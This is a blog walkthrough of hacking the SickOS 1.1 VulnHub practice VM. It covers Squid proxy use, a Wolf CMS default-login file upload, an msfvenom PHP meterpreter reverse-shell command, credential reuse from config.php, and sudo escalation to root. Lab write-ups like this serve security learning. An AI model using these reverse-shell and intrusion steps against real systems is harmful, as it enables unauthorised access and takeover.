SickOS

SickOS

I Hacked SickOS VM on vulnhub.com, Here is how a did it.

I Started by doing a nmap scan on the box

There is a squid running on the box.
A squid server is a proxy server so lets configure our browser to pass by the proxy
Once you set the proxy you can browse to the real website at http://192.168.101.229/ . The reason for this is because the website if not open from the outside, by using its own proxy we can reach the web server.

http://192.168.101.229/robots.txt
in the robots.txt there is a fileda called /wolfcms/
naturally we check on exploit-db if there are a version vulnerable to help us attacking the system.
Exploit-DB Exploit
From there i saw the path to the admin web panel.
“GET {$path}/?/admin/plugin/file_manager HTTP/1.1rn”;
So we browse http://192.168.101.229/wolfcms/?/admin/
We are granted a login page.
I googled for the default password for wolfcms wich is admin // admin.
In the web application there is a way to upload a file.

Lets generate a php meterpreter so that we have a shell access on the system.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.101.3 LPORT=443 -o phpmeter.php

If we upload the phpmeter.php
we can fetch it using http://192.168.101.229/public/phpmeter.php
This gives us a reverse shell as www-data.

python -c 'import pty;pty.spawn(a"/bin/bash")'

From this shell we can read the configuration of the web server including, the root password for mysql.
in /var/www/wolfcmd/config.php we can see the database configuration

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

So the root password for the database is john@123
By doing some enumeration on the system we can see there is an additional user named sickos, we can read the file at /etc/passwd or ls /home/
#People tend to reuse their password so we can try to log with the sickos user,
su sickos and password john@123
#Since the person who created this wasn’t careful about security, this is the default account he created, by default the main account is member of sudoers.
his means we can run any command as root on the system.
We can verify if we are in the sudoers group by doing this command.

sudo -l

User sickos may run the following commands on this host:
(ALL : ALL) ALL

This means we can switch user and login as the root account with the password john@123
sudo su to get a shell as root!

cat /root/a0216ea4d51874464078c618298b1367.txt

'If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s